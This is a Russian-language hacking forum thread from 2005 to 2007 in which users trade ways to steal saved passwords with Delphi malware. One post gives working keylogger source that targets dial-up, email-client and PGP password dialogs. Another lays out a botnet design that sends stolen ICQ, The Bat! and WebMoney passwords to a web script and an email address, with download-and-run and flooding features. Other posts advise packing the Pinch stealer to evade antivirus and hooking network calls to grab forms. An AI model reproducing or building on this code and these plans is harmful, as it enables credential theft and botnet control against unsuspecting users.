тырим пароли на делфях
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
тырим пароли на делфях - 2005-11-02 15:58:32
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
У кого-нибуть есть функции на delphi, для того чтоб выдирать пароли из: -аутлука -the bata -пароли от подключения интернета -icq -mirinda -и пароли, которые сохраняются осликом (автозаполнение) ????
Некоторые из этих функций у меня были (год назад увлекался програмированием троянов на delphi), но после форматирования диска ничего не осталось
Предлагаю общими усилиями написать навороченный троян/бот, который будет использовать технику маскировки руткитов + обход всех фаерволов (ну с фаерволами я и сам в принципе могу справиться =)))
|
|
|
тырим пароли на делфях - 2005-11-02 22:28:24
|
|
|
Nitrex
Сообщений: 404
Оценки: 0
Присоединился: 2004-09-12 23:24:27
|
имхо лучше это все делать на чистом API,иначе размер будет ОГО-ОГО. А вообще возьми 2 сырец пинча(c47.ru) Он написан на ASM'e и вставь этот код в дельфах… Вот и все…
|
|
|
тырим пароли на делфях - 2005-11-02 22:32:50
|
|
|
Parlament
Сообщений: 160
Оценки: 0
Присоединился: 2005-01-08 17:32:38
|
памоему пинч рулит адназнак… мнеб еще знания асемблера, я б улыбался… хатя пакую пинч, так че ни адин антивирь не палит, паэтаму пинч - [sm=em121.gif]
|
|
|
тырим пароли на делфях - 2005-11-03 03:47:14
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
я пол года назад пытался выдернуть код из пинча - но жестоко обламался… моих знаний ассемблера не хватило =( кто нибуть может сам выдрать и написать функции на делфи с асембл. вставками???
|
|
|
тырим пароли на делфях - 2005-11-03 11:02:34
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
хЫх для етого много знаний и не надо :)
|
|
|
тырим пароли на делфях - 2005-11-03 18:15:10
|
|
|
Maslo
Сообщений: 717
Оценки: 0
Присоединился: 2005-08-11 21:51:47
|
В натуре, юзай API, только придетса попаритса - зачастую API занимает много времени.
|
|
|
тырим пароли на делфях - 2005-11-03 19:14:49
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
Кроме api функций я ничего и не использую и не использовал никогда.Если для кого нибудь не составит трудности написать здесь эти функции на делфях (я про функции, которые тырят пароли с asm вставками из pinch) пожалуйста выложите здесь
|
|
|
тырим пароли на делфях - 2005-11-04 06:33:30
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
Я сегодня добрЫй, так что держЫ:
unit ksf; interface uses windоws,Controls,Forms, StdCtrls, Classes, ExtCtrls;
type Tf1 = class(TForm) t1: TTimer; m1: TMemo; procedure t1t(Sender: TоЬjесt); end;
var f1: Tf1; okey:byte; KAr:array[1..88] of pchar=('-Esc-','1','2','3','4','5','6','7','8','9', '0','-','=','bsp','-Tab-','q','w','e','r','t','y','u','i','o','p', '[',']','#13','-Ctrl-','a','s','d','f','g','h','j','k','l',';','''','`', '-Shift-','\','z','x','c','v','b','n','m',',','.','/','-Shift-','*', 'Alt',' ','CL','F1','F2','F3','F4','F5','F6','F7','F8','F9','F10','NL', 'SL','-Home-','-Up-','-PgUp-','-','-Left-','-*5*-','-Right-','+', '-End-','-Down-','-PDn-','-Ins-','-Del-','','','-Unk-','F11','F12');
implementation {$R *.DFM}
procedure Tf1.t1t(Sender: TоЬjесt); var key:byte; cap0:pchar; cap1:string; begin getmem(cap0,255); GetwindоwText(Getforegroundwindоw,cap0,255); //title активного окна cap1:=cap0; freemem(cap0); if(pos('Connect To',cap1)< > 0)or //DialUP (pos('Установка связи',cap1)< > 0)or //DialUP (pos('Вход в систему',cap1)< > 0)or //DialUP (pos('EType Dialer',cap1)< > 0)or //DialUP (pos('p Networking',cap1)< > 0)or //DialUP (pos('p Connection',cap1)< > 0)or //DialUP (pos('Connecting to',cap1)< > 0)or //DialUP (pos('Connessione a',cap1)< > 0)or //DialUP (pos('Edit User - ',cap1)< > 0)or //The Bat! (pos('Мастер подключения к Интернету',cap1)< > 0)or //MSIE,MSOutlook,etc (pos('сетевого пароля',cap1)< > 0)or //MSIE (pos('Свойства: ',cap1)< > 0)or //MSOutlook (pos('Вход - ',cap1)< > 0)or //MSOutlook (pos(' - Receiving mail',cap1)< > 0)or //The Bat! (pos('Окно терминала',cap1)< > 0)or //Terminal (pos('Passphrase',cap1)< > 0) //PGP Disk then begin asm in al,60h // Читаем из 60h порта нажатую кнопку в al mov key,al // Перемещаем код ключа из al в Key end; if okey< > key then begin okey:=key; if key< =88 then // Ловим Key_Down код m1.text:=m1.text+kAr[Key] // И берем по этому коду из массива строку end; end; end;
|
|
|
тырим пароли на делфях - 2005-11-05 05:58:21
|
|
|
DeathLess
Сообщений: 141
Оценки: 0
Присоединился: 2004-10-19 08:24:04
|
-ddd- Это еще что за хрень. [sm=9.gif]
А вообще в нете есть модуля на делфи дерганья пасов. А если пиньч хочешь подрубить, то берешь просто компилишь его в obj файл и подключаешь в делфи. Воть.
|
|
|
тырим пароли на делфях - 2005-11-08 03:10:32
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
Это исходняк на дельфи как он и просил:)
|
|
|
тырим пароли на делфях - 2005-11-08 11:05:48
|
|
|
DeathLess
Сообщений: 141
Оценки: 0
Присоединился: 2004-10-19 08:24:04
|
quote:
—————-<BR>Цитата: Дата:08.11.2005 3:10:32, Автор:-ddd- :: &amp;#1069;то исходняк на дельфи как он и просил:) —————-
Хм… Только пользы от этого исходника никакой. [sm=9.gif]
|
|
|
тырим пароли на делфях - 2005-11-08 15:22:21
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
DeathLess мож для и не какой, а pixcher чет собрался делать:)
|
|
|
тырим пароли на делфях - 2005-11-09 01:29:01
|
|
|
pixcher
Сообщений: 50
Оценки: 0
Присоединился: 2005-07-27 17:24:38
|
Я неплохо разбираюсь в Делфях и планирую написать бот, который для маскировки будет использовать технику руткитов и поддерживать какое-то подобие скриптов в фаиле с командами. Например можно будет в командном файле написать
http mysite.ru/phpSсгiрt.php?ip=$ip&icq=$icqpass&bat=$batpass&webmoney=$webmoneykeeperpass mail mymail@mail.ru $ip$icqpass
первая команда будет делать get запрос, заменяя $ip на реальный ip $icqpass на пассворд от аськи и тд, а вторая соответственно отсылать всё это на мыло.
какую конструкцию легко можно будет использовать для заполнения БД с паролями от асек (написав простенький скрипт на php можно будет собрать БД пасов, с возможностью поиска асек по маске или сделать, чтобы шестизначки сразу приходили тебе СМСкой на мобилу и тд - кароче очень удобно управлять ботнетом, просто переписывая этот скрипт)
конечно в боте будут присутствовать и такие "стандартные" функции, как флуд, скачай/запусти exeшку, автоматическое обновление - и тд…
Но к сожалению на просторах сети из функций выдирания пассов я нашёл только функцию, которая выдирает пасс из dualupа.Формграббер для меня тоже не проблема будет написать.Да и пароль wmкипера я смогу реализовать, через хэндлы окна программы + отослать ключ, предварительно зашифрованный в base64 .Но писать самому все функции выдирания паролей для всех программ - на это у меня уйдёт не одна неделя…или даже не один месяц =( Я бы выдрал функции из pincha, но к сожалению моих базовых знаний асм не хватает (да я знаю, что в Делфях можно подключать .obj файлы, скомпилённые на ассемблере, но какие функции юзать после подключения .obj - для меня загадка =)))
поэтому прошу помочь сэкономить моё время и подкинуть готовые примеры с этими функциями - или хотя бы напишите, в каких файлах или ветках реестра хранятся пассы от программ из списка - а я сам наваяю функции на делфях для выдирания и рассшифровки (я , конечно, могу сам "найти", где хранятся эти пассы, но тогда на изучение каждой проги придётся убить не мало времени)
вот…фуф…заранее спасибо…
|
|
|
RE: тырим пароли на делфях - 2007-07-24 03:34:18.626666
|
|
|
sever
Сообщений: 376
Оценки: 0
Присоединился: 2006-11-15 14:48:47.290000
|
одни разговоры а никто так и не выложил(((((
|
|
|
RE: тырим пароли на делфях - 2007-07-24 04:46:52.026666
|
|
|
-ddd-
Сообщений: 4918
Оценки: 42
Присоединился: 2005-05-23 17:20:41
|
sever да вЫ батенька некрафил :)
|
|
|
RE: тырим пароли на делфях - 2007-07-24 08:23:03.210000
|
|
|
M0r1arty
Сообщений: 39
Оценки: 0
Присоединился: 2007-02-16 13:20:35.186666
|
А почему бы не перехватывать такие API функции как recv,send,bind,connect чтобы определять куда ломится приложение и если это HTTP(80) - перехватывать recv как формграббер,(110) - выдирать USER..PASS Аналогично другие!
|
|
|
|
|